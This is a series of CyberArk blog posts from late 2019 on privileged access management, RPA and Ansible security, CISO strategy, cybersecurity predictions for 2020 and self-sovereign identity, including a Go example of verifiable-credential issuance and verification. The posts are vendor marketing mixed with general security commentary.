Given that third party vendor access has been at the heart of recent breaches, CyberArk recently conducted a survey of IT and security decision makers to learn more about common approaches to managing and securing access to critical internal resources. Here are some of the most eye-opening findings:

Third Party Privileged Access is Everywhere.

It’s probably not a shock to most people that 90% of respondents said that they allow third party vendors to access critical internal resources. What was slightly shocking was that more than a quarter (26%) said that they use over 100 third party vendors! That’s a lot of accounts to account for, manage and secure.

For many organizations, securing third party vendor access is incredibly complex – often requiring a cobbled together solution of products like multi-factor authentication, VPN support, corporate shipped laptops, directory services, agents and more. This has not only led to confusion and overload for security practitioners, but also creates difficult and often insecure routes for third parties to access the systems they need to do their jobs.

Which leads to our next finding….

Third Party Access is a Top 10 Organizational Risk.

Nearly three-quarters (72%) of organizations view third party access as one of their top 10 organization-wide security risks, alongside others like cloud abuse, phishing and insider threats. Third party access is quickly rising in the ranks to become a top priority for organizations and for good reason. These attacks and resulting data breaches can be incredibly costly for organizations, both in terms of reputation and financial losses.

Despite this, the same organizations overwhelmingly aren’t satisfied with how they currently approach managing and securing access for these remote vendors. A whopping 89% of respondents felt that they could do better or were completely dissatisfied with their efforts to secure third party vendor access.

Provisioning and Visibility Are a Challenge.

So, if third party access is a top 10 risk, why are so many failing to secure it? We found that 50% of organizations state that provisioning and deprovisioning access was their biggest challenge, while 47% highlighted lack of visibility.

Provisioning and deprovisioning access can feel a lot like Goldilocks and the Three Bears. You can’t allow too much access (where vendors have access to things they don’t need or for longer than they’re needed) or too little (where vendors are forced to create unsafe backdoor routes to critical resources). It has to be just right.

Legacy solutions still dominate, however. While 86% of organizations rely on VPNs to secure third party access, VPNs were never designed to manage dynamic privileged access requirements such as role-based access control and session recording. On the visibility front, companies are not always aware of what third party vendors are doing once they authenticate, and that is a serious problem. A best practice, and one often required for audit and compliance, is to record, log and monitor privileged activity.

As organizations depend more and more on third parties to get the work done, the security difficulties they face are getting harder and harder to ignore.

Without a dedicated solution for managing third party privileged access, organizations have been forced to use miscast solutions like VPNs. To remedy this, we introduced CyberArk Alero, a modern solution built for exactly this problem.

CyberArk Alero combines Zero Trust access, biometric multi-factor authentication and just-in-time provisioning into one Software-as-a-Service (SaaS)-based solution. Alero ensures that remote vendors only access what they need by integrating with CyberArk Core Privileged Access Security for full audit, recording and remediation capabilities.

Alero is designed to provide fast, easy and secure privileged access for remote vendors who need access to critical internal systems. By not requiring VPNs, agents or passwords Alero removes operational overhead for administrators and improves security.

To learn more about the challenges of securing third party access, read our eBook “Third Party Privileged Access to Critical Systems.” You can also request a demo to find out more about CyberArk Alero.

RPA: Citizen Developers – at the Corner of Speed and Value https://www.cyberark.com/blog/rpa-citizen-developers-at-the-corner-of-speed-and-value/ Tue, 03 Dec 2019 14:00:51 +0000 https://www.cyberark.com/?p=80254 Citizen Developer RPA Security

Gartner’s definition:  “A citizen developer is a user who creates new business applications for consumption by others using development and runtime environments sanctioned by corporate IT.”

The idea of a citizen developer is edging its way into reality across many Robotic Process Automation (RPA) platforms. Through a simple graphical interface and smart building tools, non-technical users are empowered to automate processes with software bots and push them into production environments. The benefits of RPA technologies and solutions are significant. Giving ordinary users the ability to assemble applications by drag-and-drop, without touching source code or knowing anything about programming languages, is a force multiplier for speed and value.

RPA can enable more rapid innovation and provide a leg up on competition.  It can also save time and money and enable the dev team to work on more impactful things.

The list goes on.

Domo Arigato, Mr. Citizen Developer

However, no technology is perfect, or perfectly safe, and RPA is no exception. In my previous blog, I touched on how RPA expands the organization's overall attack surface and how rushing into this technology without examining the security considerations introduces substantial risk. The genesis of many RPA projects can be found in the organization's Center of Excellence (COE). At the COE level, the first priority, before even beginning to weigh the benefits of RPA, is securing and managing the access rights of this digital workforce. It is important to make the security team part of the conversation on RPA implementation from the beginning. Including the security team means that security issues are addressed up front, before they can cause delays in the final stages of deployment. Sustaining world-class performance and value cannot be achieved if security is an afterthought.

Gartner reinforces this point in its “Predicts 2019: RPA Evolution”¹ report:

“The rapid adoption of RPA software has created a lot of hype in the market, leading many organizations to jump into RPA initiatives without proper analysis, planning, defined strategies and COEs. All this elevates the risk of errors by failing to automate the right processes, identify the right guardrails, and focus on security issues and access rights for the new virtual users (RPA bots).”

What’s the Risk?

Security needs to be built in directly as part of the automation workflow.  As citizen developers become increasingly common, “security by design” becomes even more critical. Anyone can make mistakes, but citizen developers – who lack both technical and security know-how – are more likely to make the kinds of mistakes that unknowingly expose access to sensitive corporate networks and systems.

Many of the current low-code platforms do not have built-in security, but IT can hook the platforms into best-in-class security solutions, taking security out of the hands of the less security-conscious citizen developer.  If there aren’t enough developers to go around at the organization, credential management and security need to be top of mind before diving into low-/no-code environments or giving citizen developers access.  Moreover, they need to be at the top of the list of strategic objectives for the COE to ensure that RPA is implemented securely and the desired outcome of the program is achieved successfully.

Gartner reaffirms the importance of credential security in its “Best Practices for Robotic Process Automation Success”² report:

“One of the most critical functions of the management platform is credential management. With robots actively accessing and manipulating data, thoughtful consideration and intentional implementation of credential management is a requirement of all RPA deployments. The management platform of an RPA system should allow for the creation, deletion and expiration of credentials for the RPA system, as well as the encryption of any locally stored credentials, if the use case requires them. “IGA, RPA, and Managing Software Robot Identities” is required reading for architects and technical professionals responsible for IAM.”

Why Security Matters

Developers often work fast and dirty.  They have aggressive deadlines.  They have internal and external pressures to get their code out the door at lightning speed.  Anything that has even a remote chance of slowing code production takes a back seat, and security is no exception to this rule.  Now consider the citizen developer.  The majority of traditional developers at least have some knowledge of the importance of developing secure code – whether they choose to maintain technical ethics and write their code in a secure manner is another story.  However, the citizen developer doesn’t think like the traditional developer.  The citizen developer is oftentimes a standard business user in some sort of managerial/supervisory capacity. They probably know very little about application and credential security, so they introduce risk to the app development pipeline.

Here are a few things to consider to help maintain the correct balance of security and usability:

  1. Be selective in who’s using these platforms.
  2. Establish guardrails and ensure users stay within the bounds of IT best practices.
  3. Automate any elements of security that can be automated (e.g. remove the application’s hard-coded credential and force the software bot to validate/authenticate prior to connecting to mission/business critical apps).
  4. Secure the RPA console and establish individual accountability for users with highly privileged access.

Embrace Digital Transformation with Confidence.

Move fearlessly forward into the new digital landscape with CyberArk and take the first step by requesting a demo today. See how easy it is to start securing RPA workflows and processes with the #1 leader in privileged access security. To learn more about how to get started securely deploying RPA, read Gartner’s analyst report, “Predicts 2019: RPA Evolution.”¹


1 – Gartner, “Predicts 2019: RPA Evolution,” 6 December 2018, Analyst(s): Stephanie Stoudt-Hansen, Frances Karamouzis, Arup Roy, Arthur Villa, Melanie Alexander

2 – Gartner, “Best Practices for Robotic Process Automation Success,” 18 June 2019, Analyst(s): Gregory Murray

Securing Ansible Automation Environments with CyberArk https://www.cyberark.com/blog/securing-ansible-automation-environments-with-cyberark/ Tue, 26 Nov 2019 14:00:36 +0000 https://www.cyberark.com/?p=80113 Ansible Automation

Automation Is Transforming IT Departments

Automated processes are transforming IT functions – even IT departments – by replacing manual tasks once handled by IT administrators with self-service tools and automated processes. For some organizations, automation tools are becoming the new system administrators, while, at the same time, helping IT professionals expand their reach across the organization.

What Is the Red Hat Ansible Automation Platform?

Red Hat’s Ansible Automation Platform incorporates Red Hat Ansible Engine, Red Hat Ansible Tower and SaaS-based capabilities for secure content management and analytics around automation deployments. The Platform is used by companies around the world, including many CyberArk customers.

Red Hat Ansible Automation Platform provides enterprises with orchestration, configuration management and governance capabilities at scale, helping them to accelerate DevOps and digital transformation initiatives. For example, Red Hat Ansible Automation Platform enables organizations to rapidly provision cloud and on-premises infrastructure, deploy and update applications and meet other critical IT needs.

Automation Can Expand the Attack Surface

To perform and automate all of these functions, Red Hat Ansible Automation requires a high level of privileged access – in the form of powerful credentials or secrets – to access and manage IT resources and other services. As a typical Ansible Playbook can hold privileged credentials for many different IT resources, operating environments and tools, from a security perspective Ansible is often considered a Tier Zero (or mission-critical) asset.

Because of this, Ansible and other automation tools are attractive targets for cyber attacks. Threat actors can seek to compromise the credentials used by automation tools, just as they would for other Tier Zero assets such as Jenkins or root. If compromised, the attacker could gain access to many other IT resources and processes.

Frequently, human error or the absence of a robust security process results in inadvertent security vulnerabilities. And when poorly secured processes are automated, those vulnerabilities can scale exponentially and unnecessarily expose the enterprise to serious risk.

How Should Automation Environments Be Secured?

First, the secrets and privileged credentials used by automation solutions need to be secured. This starts by removing any hard-coded credentials from playbooks and any other places they’re located and rotating and managing credentials based on policy.  In some cases, monitoring activity to see how sensitive or powerful credentials are being used and applying just-in-time access and least privilege principles can help strengthen protections.

Second, the security footprint of the admin console – including human and programmatic access to the console – can be enhanced by taking a layered approach to access and credentialing. This involves rotating and managing credentials used by humans based on policy and roles, monitoring as needed and applying least privilege with just-in-time access as needed.

Securing development and automation environments can become increasingly difficult as organizations start to use a variety of platforms beyond Ansible (e.g., Jenkins, Red Hat OpenShift, Kubernetes, Puppet, AWS, Azure and others) with duplicate secrets management processes for each platform. This can create “security islands” that each require separate maintenance, management and auditing.

Ansible Automation leverages CyberArk to secure and manage the credentials that automation environments use to actually automate IT deployments.

Enhancing Ansible Security with CyberArk Integrations

CyberArk offers several integrations with Red Hat Ansible Automation to provide organizations with simplified, automated secrets management, including integrations with both the CyberArk Application Access Manager Central Credential Provider and Dynamic Access Provider, as well as CyberArk Conjur Open Source.  Very briefly, these integrations include:

  • Red Hat Ansible Tower Secrets Management System. This integration provides Ansible Tower users with an easy-to-use menu option to select CyberArk to centrally secure, manage, audit and rotate the secrets used by Ansible Tower (v3.5.1 and higher) to access IT and other resources, while enabling just-in-time secrets retrieval. See documentation here.
  • Onboarding Secrets Created in Play. This integration leverages the CyberArk Privileged Access Security Solution to randomize secrets created mid-play and onboard secrets into the Vault before the end of play.
  • Built-In Lookup Plugins for Ansible Engine (AAM Lookup and DAP/Conjur Lookup). Available in Ansible Engine v2.5 and above, the plug-ins retrieve secrets “just-in-time” from Dynamic Access Provider or Conjur Open Source.
  • Protecting the Ansible Console. This integration uses the Secure Web Application Connectors Framework to enable CyberArk to provide enhanced protection for the Red Hat Ansible Tower Website account.

There is also an integration that enables CyberArk DNA to detect unprotected credentials in Ansible Playbooks. CyberArk also has an integration with the Ansible security automation that enables Ansible Automation to automate CyberArk and other security functions. Learn more about these and other Ansible integrations on the CyberArk Marketplace or by joining the CyberArk open source community, CyberArk Commons. And, for a deep dive on Ansible Automation secrets management with Conjur Open Source, read “Managing Secrets in Red Hat Automation Playbooks.”

Learn More: Dec. 11 Webinar and Dec. 4 Workshop

Additionally, we have two live events scheduled in December. Both events are ideal for:

  • Ansible Automation developers who want to find ways to better secure their Ansible Playbooks by utilizing their organization’s existing CyberArk infrastructure.
  • Cybersecurity professionals who want to better secure their organization’s Ansible environment by giving automation developers more secure access to privileged credentials managed by CyberArk.

Don’t miss our December 11 webinar, “Securing Ansible Automation Environments with CyberArk.”  This webinar explores common use cases and best practices for securing Ansible Automation environments and includes practical tips for getting started and improving security by enhancing Ansible’s native capabilities without slowing down automated processes. Register Here.

We’ve teamed up with Red Hat for a hands-on Ansible Workshop, “Securing Ansible Automation Environments.” This workshop highlights practical guidance for using CyberArk to help secure Ansible Playbooks and environments. The December 4 half-day workshop will be held in Chicago.

Attendees will participate in hands-on exercises and interact with security and automation peers to share challenges and successes. Request registration for the workshop or learn more by contacting sales@cyberark.com. Space is limited, so get in touch today!

How CISOs Can Be Accelerators for Digital Transformation https://www.cyberark.com/blog/how-cisos-can-be-accelerators-for-digital-transformation/ Thu, 21 Nov 2019 14:00:42 +0000 https://www.cyberark.com/?p=79674 Digital Transformation for CISOs

It’s safe to say digital transformation has reached a tipping point. No longer just a buzzword or aspiration, it’s happening en masse. Companies are rapidly modernizing their infrastructure and processes to improve customer service, application development, supply chain collaboration and much more.

According to a new CyberArk study, the vast majority of businesses (74%) are engaging in some level of digital transformation today, with most deploying digital transformation projects at enterprise scale.  Whether it’s foundational technologies like cloud or emerging initiatives like DevOps and robotic process automation, companies are employing them to boost productivity, increase revenue opportunities and reduce costs. However, new technologies and processes also create new risks and operational challenges.

Successful Digital Transformation Demands Security: Priority or Just Lip Service?

One of the most interesting things we found in the study was how important cybersecurity and the role of the Chief Information Security Officer (CISO) was to the success of digital transformation initiatives. Almost everyone agreed that security should be embedded from the start of all digital transformation projects. Nearly half (44%) of respondents said digital business projects would move faster with security leaders involved from the onset – leading to faster time to value.

Yet, despite this, most companies aren’t making security a strategic focus as they embrace transformative technologies. Just one-third reported having a dedicated security team responsible for digital transformation, and only 38% reported that CISOs are brought in at the beginning of a digital transformation initiative.

That could be because many (60%) view CISOs as functional managers rather than strategic advisors who can help guide digital business strategies. In fact, 40% reported that they would either find workarounds or move forward without security’s approval if security professionals deemed the digital transformation initiative presented too much risk.

If security is widely considered to be a crucial component of digital transformation initiative success, why is there such a disconnect? Is it a culture issue within organizations? Is the need for speed trumping strategic CISO counsel? Is the CISO failing to lean in? Is the CISO unsupported by other business leaders? Or, perhaps, it’s a dangerous mix of all of these scenarios.

Creating A Security-First Mindset

While digital transformation programs offer a significant opportunity for CISOs to demonstrate their strategic acumen, a security-first culture starts at the top. It’s not just up to the CISO to “lean in” more. Driving meaningful change within an organization must be championed by the rest of the top line business leaders and cascaded throughout the organization. However, there are some things CISOs can do to help drive this change forward.

Check out the video below for the top 3 CISO digital transformation strategies:


Transformational initiatives deserve heightened security consideration and CISOs deserve a seat at the table from the get-go. Business leaders must acknowledge security’s ability to shape and accelerate digital transformation initiatives – and elevate and empower CISOs to drive these changes. Organizations that get this right will be best equipped to move fearlessly forward in the new digital landscape.

To learn more about strategies CISOs can take to drive successful digital transformation initiatives download the full report “Three CISO Strategies for Digital Transformation Success.”

The Top Cybersecurity Trends That Will Shape 2020 https://www.cyberark.com/blog/the-top-cybersecurity-trends-that-will-shape-2020/ Tue, 19 Nov 2019 14:00:29 +0000 https://www.cyberark.com/?p=79161 Cybersecurity

As we embark on a new year, it’s normal to think about what the future will have in store for us. From a cybersecurity perspective, there are a lot of questions about what’s coming. What are the big technology trends and what risks will they pose?

Will attackers be interested in new technologies like AI and biometrics or will they focus on infiltrating conventional systems in new and innovative ways? What will the attack vectors be? Will traditional attack methods continue to reign supreme or will new approaches emerge?

As we head into a new decade, there’s no doubt that attackers will try to use innovation against us, but determining where they will focus is always a challenge. Here are the top security trends we believe will impact both businesses and consumers in 2020:

1. Drones Open up New Pathway for Intelligence Gathering

To date, the security concern around drones has mostly been focused on the physical damage nefarious actors, including nation states, could perpetrate. In 2020, we could start seeing attackers focus more on what drones know and how that information can be exploited for intelligence gathering, corporate espionage and more.

While it’s true that drones have the potential to do physical damage, the longer-term opportunity for attackers is to use drones as another pathway to steal – and manipulate – sensitive information.
Goldman Sachs recently predicted that businesses will spend more than $17B in the next five years on drone functionality. With an emphasis on innovation and development, these devices need to be treated the same as any other IoT device with software that gathers and stores sensitive information that needs to be protected.

Organizations need to consider who has the ability to control the drone’s activities, what information the drone is storing, how access to that information is being managed and monitored and, ultimately who owns responsibility for securing it. The creation of a security framework that mitigates emerging security risks and potential regulatory and compliance challenges can help address these questions.

2. The Butterfly Effect of Ransomware

In the first nine months of 2019, reports indicate there were between 600-700 ransomware attacks on government agencies, healthcare providers and schools in the U.S. alone. Cities and public sector organizations around the world have faced a steady barrage of ransomware attacks with momentum continuing to build heading into 2020. With these attacks aimed at disruption and destabilizing systems, cities and towns, in particular, will need to elevate their approach to cyber resiliency.

The constant bombardment will have a butterfly effect whose impact will reach far beyond what we’ve seen to date. These effects will include:

  • Attacker Innovation Shifts to the Cloud: The absence of spectacular ransomware attacks like Petya doesn’t mean attackers have stopped investing in malware. They’re just shifting their focus. In many ways attackers subscribe to the “if it ain’t broke don’t fix it” philosophy. The malware families that have been around for years still work and are effective for many reasons – mostly because many organizations still neglect to adhere to basic patching practices.

That said, attackers keep looking for new ways to monetize their assaults. If they’ve got malware that is steadily performing in Windows environments, what’s the next target? Attackers want access to a greater diversity of systems, including cloud environments and containers. Coming up, we’ll begin to see innovation in ransomware that focuses more on Linux to take broader advantage of digital transformation trends.

  • Cyber Insurance Gold Rush Fuels Ransomware Attacks: Despite government warnings not to pay the ransom in ransomware attacks, more organizations are turning to cyber insurance to protect their assets and uptime. We expect to see a significant increase in the number of entities buying cyber insurance, making it one of the fastest growing markets related to cyber security. In fact, cyber insurance is projected to be a $7 billion market in the U.S. alone. However, this investment in “protection” is having a contrary effect – and will drive even greater waves of attacks.

Attackers will target organizations with cyber insurance because those organizations are more likely to pay. Insurance companies weighing the cost benefits of a payout will often choose to pay if the cost of the ransom is less than the cost of the downtime needed to rebuild a network. Ultimately, this gold rush will benefit attackers – tilting the power in their direction, fueling resources and spurring the need for policy changes and disruption across the insurance industry.

3. Election Security: Cyber Attacks as a Disenfranchisement Mechanism

Election security is a hot topic for democracies everywhere. While much of the discussion tends to focus on disinformation campaigns, including the use of deepfake technology to influence opinion, attacks will evolve to disrupt more than just the media.

It’s important to consider the broader effect of disruption and disenfranchisement beyond ballot box tampering. Attackers have repeatedly demonstrated their ability to cause disruption. Their impact on democracies could come in many – even seemingly disconnected – forms.

Stalling major transportation systems – like buses and trains – in major metropolitan areas could keep citizens from safely getting to the polls. A sequence of such attacks targeting core infrastructure – halting transportation, shutting down the electrical grid or launching an attack on voter registration databases – could have a domino effect that negatively impacts the voting system’s ability to operate consistently with trust and reliability.

4. Biometrics Create a False Sense of Security in the Enterprise

With biometric authentication becoming increasingly popular, we’ll begin to see a level of unfounded complacency when it comes to security. While it’s true that biometric authentication is more secure than traditional, key-based authentication methods, attackers typically aren’t after fingerprints, facial data or retinal scans. Today, they want the access that lies behind secure authentication methods.

So, while biometric authentication is a very good way to authenticate a user to a device, organizations must ensure that, every time that happens, the biometric data is encrypted and the assets behind the authentication are kept secure.

Even more importantly, the network authentication token that’s generated must be protected. That token, if compromised by attackers, can allow them to blaze a trail across the network, potentially gaining administrative access and privileged credentials to accomplish their goals – all while masquerading as a legitimate, authenticated employee.

Self-Sovereign Identity: A Distant Dream or an Immediate Possibility? https://www.cyberark.com/blog/self-sovereign-identity-a-distant-dream-or-an-immediate-possibility/ Thu, 14 Nov 2019 16:36:08 +0000 https://www.cyberark.com/?p=99162

To help solve the identity problem, enter Self-Sovereign Identity (SSID), which enables users to own, control, and present their identity data as needed all the while enabling service providers to securely validate and trust the identity claim.

In today’s digital world, our identities are scattered everywhere, across every app and service we interact with, either at home or at work. Most of us have lost track of the countless registration forms we have filled out, providing our personal identity information with a faint assumption that the provider can be trusted and will secure our data. But this uncontrolled data proliferation and the service provider’s inability to properly secure critical elements of identity have time and again proven to be the root cause of frequent identity breaches. Social identity providers such as Facebook, Twitter and LinkedIn rushed in to address this issue by centralizing the identity and presenting it to the requesting service upon user consent. Some of these centralized identity providers have become regular and easy targets for hackers, who can obtain users’ information from one source rather than scour through multiple providers.

These breaches not only affected our social, professional and financial lives but also led us to slowly accept the alternative reality that privacy is no longer a social norm or a personal choice. Providers are also subject to liability provisions for storing users’ data across geographical jurisdictions and are required to comply with various privacy compliance requirements such as HIPAA, GDPR, CCPA, etc., and any breach of their systems could result in significant fines and reputation loss. This makes the identity problem a double-edged sword for the user and the provider, and a difficult one to solve.

Enter the world of Self-Sovereign Identity

Now imagine a concept where the digital world no longer requires a user’s personal data but can validate the identity by just accepting a “verifiable credential” issued to the user by competent and trusted identity authorities. A non-digital equivalent of this would be our paper-based passports, driver’s license or birth certificates that are issued by the relevant government authorities that we store in a secure place and present as a proof to services that require them. For instance, each time we (the holder) board an airplane or rent a car we prove our claims by opening our wallet and presenting a trusted authority (the issuer) issued identity card to a person or company who needs to trust the claim (the verifier).

In the digital world, this would be achieved using mathematically derived, unique and random identifiers, known as Decentralized Identifiers (DIDs). The user uses a secure wallet app on their trusted device to generate a public/private key pair, stores the private key on the device and publishes the public key to an SSID-powered decentralized ledger (like Sovrin), which then generates and stores the User DID for the public key in its data store. The user then requests validated digital identity claims from a trusted authority (such as the Department of Motor Vehicles for a driver’s license, the Department of State for a passport, etc.). The trusted authority issues verified credentials, containing verified personal information/attributes about the user (claims), after signing them with its own DID (known as the Issuer DID). The verified credential is then counter-signed by the User DID and stored in a secure wallet app on the device, encrypted and fully in the user’s control. When service providers require user information, users can present the whole claim or only a subset of the claims in the verified credential from their secure wallet (hence self-sovereign). The claim can also be modified by the user to ensure minimal disclosure of private data (for instance, present Age>18 without revealing the user’s date of birth) without compromising the signature of the original claim. The service provider can validate the authenticity of the identity by verifying the public key signatures of the User DID and Issuer DID against the decentralized ledger and provide the requested service based on the presented claim. Users can also use their wallet to view and track which service providers they granted claims to and revoke them at any time as needed.

This concept is what is referred to as Self-Sovereign Identity (SSID), which enables users to own, control and present their identity data as needed, all the while enabling service providers to securely validate and trust the identity claim. SSID can also be viewed as “decentralized, claims-based authentication and authorization” of the user by the service provider (Claims Verifier), with the public decentralized ledger acting as a smart verifiable contract between the Issuer, Holder and Verifier entities. Blockchain technologies such as Sovrin, Bitcoin and Ethereum are built on decentralized ledger technology (DLT), are immutable by design and qualify as ideal candidates for realizing SSID.  It’s important to note that users’ personally identifiable data is stored only on the end user’s device and never on the blockchain ledger. Claims Issuers are also not required to be online during claims verification, as verification is performed against the highly available decentralized ledger.

[Image: Self-Sovereign Identity diagram 1]

Let’s see how this works with a use case. John Smith needs to rent a car for his personal travel. Typically, he would need to individually sign up with all his personal details at car rental websites to prove his age (provide his date of birth) and provide proof of a valid driver’s license (upload a copy of his driver’s license) before he can complete the booking. The diagram below represents how he will present his SSID to complete this transaction.

[Image: Self-Sovereign Identity diagram 2]

In the above use case, John (the holder of the verifiable credential, aka digital identity) is only required to provide his personal information to prove his identity to the trusted identity provider, the Department of Motor Vehicles, and obtain a validated, verifiable credential that is signed by the Issuer DID, which was previously registered in a decentralized data store (the Verifiable Data Registry). This signed credential/claim can be securely stored on his trusted mobile device and associated with a unique digital identity (User DID) that is also registered in the decentralized data store. Once this is established, he can choose to present only the subset of the digital identity attributes that the car rental company requires, without invalidating the signature of the Department of Motor Vehicles. The car rental company can then verify the authenticity of the identity and claim by verifying the User and Issuer DID signatures (contained in the claim) against the verifiable data registry, and validate that John meets the legal age requirement to drive and has a valid driver’s license before completing the booking. The transaction would not have gone through if his driver’s license had expired, as per the rules (expiry date) defined in the verifiable credential schema set up by the Department of Motor Vehicles. If he then needs to make a reservation at a hotel or book his airline tickets, all John needs to do is share this verified digital identity, without registering his personal information on each of these service provider websites.
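The issue/present/verify exchange described above, written out as an added Go example that is not part of the original post or of any SSID product or ledger. It assumes a toy `did:example` identifier derived from the public key, an in-memory map standing in for the verifiable data registry, and per-claim salted hash commitments so the holder can disclose a subset without invalidating the DMV’s signature; the post’s age predicate (Age>18 without the date of birth) is approximated by an `over_18` attribute issued by the DMV rather than a zero-knowledge proof.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"time"
)

// Registry stands in for the decentralized ledger: DID -> published public key, and no personal data.
type Registry map[string]ed25519.PublicKey

// did maps a public key to an identifier (hypothetical DID method, not a real one).
func did(pub ed25519.PublicKey) string { return "did:example:" + hex.EncodeToString(pub) }

// Credential carries salted commitments to the claims, so the issuer signature survives partial disclosure.
type Credential struct {
	IssuerDID, HolderDID string
	Expiry               time.Time
	Commit               map[string]string // claim name -> hex(sha256(name|value|salt))
	IssuerSig            []byte
}

// Presentation is the revealed subset, counter-signed with the User DID key and bound to a verifier nonce.
type Presentation struct {
	Cred             Credential
	Disclosed, Salts map[string]string
	Nonce            string
	HolderSig        []byte
}

// commit binds one claim value to the credential without revealing it; the salt stops guessing attacks.
func commit(name, value, salt string) string {
	h := sha256.Sum256([]byte(name + "|" + value + "|" + salt))
	return hex.EncodeToString(h[:])
}

// digest hashes canonical JSON (encoding/json sorts map keys); callers blank the signature field first.
func digest(v interface{}) []byte { b, _ := json.Marshal(v); sum := sha256.Sum256(b); return sum[:] }

func (c Credential) tbs() []byte   { c.IssuerSig = nil; return digest(c) }
func (p Presentation) tbs() []byte { p.HolderSig = nil; return digest(p) } // Cred, with its IssuerSig, stays inside

// Issue: the issuer (DMV) commits to every claim and signs for holderDID; salts go to the wallet, not the ledger.
func Issue(issuerPriv ed25519.PrivateKey, holderDID string, claims map[string]string, expiry time.Time) (Credential, map[string]string) {
	c := Credential{IssuerDID: did(issuerPriv.Public().(ed25519.PublicKey)), HolderDID: holderDID, Expiry: expiry, Commit: map[string]string{}}
	salts := map[string]string{}
	for n, v := range claims {
		var raw [16]byte
		rand.Read(raw[:]) // crypto/rand: on current Go this never returns an error
		salts[n] = hex.EncodeToString(raw[:])
		c.Commit[n] = commit(n, v, salts[n])
	}
	c.IssuerSig = ed25519.Sign(issuerPriv, c.tbs())
	return c, salts
}

// Present: the holder reveals only the named claims (minimal disclosure) and counter-signs.
func Present(holderPriv ed25519.PrivateKey, c Credential, claims, salts map[string]string, reveal []string, nonce string) Presentation {
	p := Presentation{Cred: c, Disclosed: map[string]string{}, Salts: map[string]string{}, Nonce: nonce}
	for _, n := range reveal {
		p.Disclosed[n], p.Salts[n] = claims[n], salts[n]
	}
	p.HolderSig = ed25519.Sign(holderPriv, p.tbs())
	return p
}

// Verify is the car-rental check: resolve both DIDs, check signatures, nonce and expiry, match claims to commitments, apply policy.
func Verify(reg Registry, p Presentation, nonce string, now time.Time) error {
	issPub, holPub := reg[p.Cred.IssuerDID], reg[p.Cred.HolderDID]
	switch {
	case issPub == nil || holPub == nil:
		return fmt.Errorf("issuer or holder DID not in registry")
	case !ed25519.Verify(issPub, p.Cred.tbs(), p.Cred.IssuerSig):
		return fmt.Errorf("issuer signature invalid")
	case p.Nonce != nonce || !ed25519.Verify(holPub, p.tbs(), p.HolderSig):
		return fmt.Errorf("holder signature or nonce invalid")
	case now.After(p.Cred.Expiry):
		return fmt.Errorf("credential expired")
	}
	for n, v := range p.Disclosed {
		if commit(n, v, p.Salts[n]) != p.Cred.Commit[n] {
			return fmt.Errorf("claim %q does not match the issuer's commitment", n)
		}
	}
	if p.Disclosed["license_status"] != "valid" || p.Disclosed["over_18"] != "true" {
		return fmt.Errorf("rental policy not met")
	}
	return nil
}

func main() {
	dmvPub, dmvPriv, _ := ed25519.GenerateKey(rand.Reader)
	johnPub, johnPriv, _ := ed25519.GenerateKey(rand.Reader)
	reg := Registry{did(dmvPub): dmvPub, did(johnPub): johnPub} // both public keys published to the ledger
	claims := map[string]string{"name": "John Smith", "dob": "1985-04-02", "over_18": "true", "license_status": "valid"} // constructed sample
	cred, salts := Issue(dmvPriv, did(johnPub), claims, time.Now().Add(365*24*time.Hour))
	p := Present(johnPriv, cred, claims, salts, []string{"over_18", "license_status"}, "rental-nonce")
	fmt.Println("rental check:", Verify(reg, p, "rental-nonce", time.Now())) // <nil>: name and dob never leave the wallet
}
```

The nonce is the verifier's defence against a captured presentation being replayed; without it, anyone who intercepts John's presentation could reuse it at another rental desk.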

Challenges to Self-Sovereign Identity

There are a few real-world use cases that indicate the rapid advancement and usage of blockchain for digital identity. However, industry standards for digital identity definitions and its interoperability mechanisms are just evolving, primarily driven by World Wide Web Consortium (W3C), and would need to be finalized to enable holders, issuers, and verifiers to securely transact using digital verifiable credentials.

Self-sovereign also does not mean you have full rights to verify your own identity. There is still reliance on trusted authorities to validate and issue verified credentials. Users are still required to obtain such verified credentials from multiple trusted authorities and store them in a secure wallet on their device before they can transact with today’s digital world. How users can move their verified credentials from one device wallet to another, or recover them when they lose their trusted device, is another challenge worth noting.

Then comes the important challenge of the right to be forgotten. Though the presented claims are not expected to be persisted by the service provider, there can be several instances where they would want to store user attributes in their own data store for seamless and continued service. For instance, an online retailer will require a name, address and phone number to deliver an item ordered by the user. Even though they may have obtained this data upon express consent of the user, they may decide to store it in their own datastore for continued service or marketing needs. The data is then outside the self-sovereign identity realm, which breaks the very fundamentals of decentralized identity and the concept of owning and controlling your own data. When the user decides to revoke the previously granted claim, all they can do is request that the claim be removed and forgotten by the service provider. There are no automated processes or standards in place to fulfill this right-to-be-forgotten scenario, which could then lead to the very data breaches that self-sovereign identity was conceived to address.

Closing thoughts

As governments and compliance agencies tighten user privacy requirements, there is no doubt that self-sovereign identity has great potential to change the way our digital data is verified, stored and shared. Though there is a great deal of enthusiasm around SSID, with the ecosystem and standards rapidly evolving, we are still very far away from an ideal world where we can truly own, control and transact with our self-sovereign identity.

Three Cybersecurity Lessons Learned in the 2010s https://www.cyberark.com/blog/three-cybersecurity-lessons-learned-in-the-2010s/ Thu, 14 Nov 2019 14:00:21 +0000 https://www.cyberark.com/?p=79205 Privilege Access Management PAM

As we face the close of the decade in a couple of short months, it seems like a good time to take stock of the progress cybersecurity technology has made in the 2010s before we start looking ahead to what’s next in the ‘20s. A few weeks ago, I had the opportunity to attend KuppingerCole’s CyberNext Summit 2019 and Borderless Cyber 2019 conference in Washington DC.

The conference centered on some of the latest developments in the field of cybersecurity and left me thinking about some of the lessons learned over the past decade. Here are three trends and technologies that took off in the past decade and what we can learn from them.

  1. Eliminating Security Silos

One of the major business challenges of the past decade is associated with siloed and often disconnected data and tools – slowing operational effectiveness and the ability to deliver innovative products and services. Never mind the introduction of massive security risk. An industry-led solution to this challenge was a major announcement from the conference – the introduction of a global, multi-vendor cybersecurity ecosystem, the Open Cybersecurity Alliance (OCA) through the OASIS international consortium.

OCA gets its legs from the fact that, on average, organizations use between 25 and 49 different security tools from up to 10 different vendors. Managing that many tools is both time consuming and expensive, and it makes integrating security tools into established operational environments difficult.

The OCA provides out-of-the-box integrations between these tools to foster an open cybersecurity ecosystem, enable the free exchange of information and orchestrate responses via commonly developed code and tools, using agreed upon tech, standards and procedures. The OCA already has two main projects underway. The first is IBM Security’s STIX-Shifter, which is dedicated to the development of a search function for cybersecurity products. The second is McAfee’s OpenDXL, an interoperable messaging format that helps organizations share information.

